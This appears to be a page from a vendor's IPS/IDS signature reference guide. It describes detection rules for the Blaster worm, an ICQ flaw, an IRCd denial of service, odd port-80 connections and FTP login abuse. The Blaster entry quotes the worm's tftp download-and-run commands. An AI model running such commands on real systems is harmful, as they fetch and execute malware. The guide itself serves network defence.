TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
417
Signature Description: The Blaster worm propagates via the Microsoft Windows DCOM RPC Interface Buffer
Overrun Vulnerability. The worm opens a command shell on victim host on TCP port 4444. It issues the commands
"tftp <host> GET msblast.exe" and "start msblast.exe" over thecommand shell. The command shell is closed once the
attacking host disconnects.<br>A Windows Distributed Component Object Model (DCOM) Remote Procedure Call
(RPC) interface in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 is vulnerable to a buffer overflow condition.
Successful exploitation of the vulnerability could allow execution of arbitrary code using SYSTEM privileges.
Signature ID: 10190
CHAT ICQ forced user addition Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1305
Bugtraq: 3226
Signature Description: ICQ is an instant messaging application from Mirabilis. A webserver can force the addition of
arbitrary ICQ UINs to a target user's ICQ contact list, if they are running ICQ and browsing with Microsoft Internet
Explorer. This is due to the way Explorer and ICQ handle data returned from a webserver with a 'application/x-icq'
Content-Type. In more recent versions of the ICQ client, the user is prompted to add a user to the contact list.
Vulnerable platform is ICQ 2000.
Signature ID: 10193
Chat IRC channel join DoS
Threat Level: Information
Signature Description: IRCd (Internet Relay Chat) versions 2.10 through 2.10.3p3 are vulnerable to a denial of service
attack, caused by a buffer overflow in m_join in channel.c. This rule detects the attempt to exploit these buffer
overflow vulnerabilities.
Signature ID: 10213
Connection Closed Message from Source Port 80
Threat Level: Information
Signature Description: This rule triggers when a 'Connection closed by foreign host' message comes from external
network who initiates connection on source port 80. Since the external connection source port is 80, this is unusual
behavior. An attacker may use port 80 on the external machine to initiate a connection to a machine on the protected
network in an attempt to bypass firewall protection.
Signature ID: 10214
FTP - Multiple bad Login attempts
Threat Level: Critical
Signature Description: Attackers may continouly attempt to gain access to FTP servers by guessing different
usernames and passwords.The server sends an error response for each login failure.This signature generates an alert
message if six such failure responses are generated by the server in 20 secs.The administrator should monitor such
attempts and take appropriate action.
Signature ID: 10215
FTP - Access using empty Password
Threat Level: Warning
Industry ID: CVE-2001-1424
Bugtraq: 2568
Signature Description: FTP servers contain null or default passwords when shipped.This allows attackers to conduct
unauthorized activities. This signature raises an event whenever an FTP PASS command is received with empty(null)
password.This could permit a user to reconfigure the unit, or set the password and prevent the device from being
reconfigured.<br>This vulnerability allows the attacker to browse the file structure of the affected device.